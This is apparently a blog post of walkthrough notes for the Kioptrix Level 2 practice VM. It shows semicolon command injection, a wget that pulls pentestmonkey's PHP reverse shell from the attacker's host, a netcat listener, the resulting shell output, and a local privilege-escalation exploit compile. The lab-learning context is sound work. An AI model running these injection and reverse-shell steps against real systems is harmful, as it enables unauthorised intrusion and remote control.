Kioptrix-2



Kioptrix-2 Walkthrough / Notes


basic sql injections gets you in..


using a semi colon ';' finishes the last connection and allows for the next command.

examples:

; ls -la

; whoami

; cd /usr/ && ls -la

so we can string commands together using '&&' as per usual from the shell.

we setup a python http server on port 4444 from the directory where the 'php-reverse-shell' resides from pentest monkey.

(we cant use b374k as we cant access the file directly form the URL)

we port forward port 4444 from any IP to our local machine LAN address.

Now we change the IP address in php-reverse-shell to be our public IP and port 4444

next we upload the phpfile - but we cant because we dont have permission in the current directory.

so we find a directory we can write to.

;whoami
apache

 ok so we now we are the user apache

 lets now see what directories are owned by apache

;find / -user apache
---snipit---
/var/cache/mod_proxy
/var/cache/mod_ssl
/var/lib/dav


ok so the directory "/var/lib/dav" looks like a good place to upload our reverse-shell






next we cd into the directory and upload out shell




;cd /var/lib/dav && /usr/bin/wget PUBLIC-IP:4444/php-reverse-shell.php








at the same time make sure youre http server is runnign and in the directory where the php-reverse-shell file resides






#python -m SimpleHTTPServer 4444


Serving HTTP on 0.0.0.0 port 4444 ...
212.83.142.83 - - [19/Sep/2017 17:55:13] "GET /php-reverse-shell.php HTTP/1.0" 200 -







Awesome! out file has been uploaded to the server. lets confirm




;ls -la /var/lib/dev




We should see the file...




Next we need to make sure the file has permission to be executed. 




;chmod 777 /var/lib/dev/php-reverse-shell




And now we have a listener setup on the sending box. (seems backwards...)






;nc -v -n -l -p 4444




ok now we execute the php file, as we cant browse to it we use the 'php' command






;php /var/lib/dev/php-reverse-shell.php






And we should get the shell




listening on [any] 4444 ...
connect to [192.168.0.100] from (UNKNOWN) [212.83.142.83] 32800
Linux kioptrix.level2 2.6.9-55.EL #1 Wed May 2 13:52:16 EDT 2007 i686 i686 i386 GNU/Linux
 17:10:07 up  3:41,  0 users,  load average: 0.00, 0.00, 0.00
USER     TTY      FROM              LOGIN@   IDLE   JCPU   PCPU WHAT
uid=48(apache) gid=48(apache) groups=48(apache)
sh: no job control in this shell
sh-3.00$ 



























Priv escalation spoiler


#gcc -o 9542 9542.c && ./9542









Output to Web Browser

;php /var/lib/dav/php-reverse-shell.php


Content-type: text/html
X-Powered-By: PHP/4.3.9

Content-type: text/html
X-Powered-By: PHP/4.3.9

Successfully opened reverse shell to 94.10.218.73:4444
ERROR: Shell connection terminated



















































No comments:















Post a Comment


























        

      









Subscribe to:
Posts (Atom)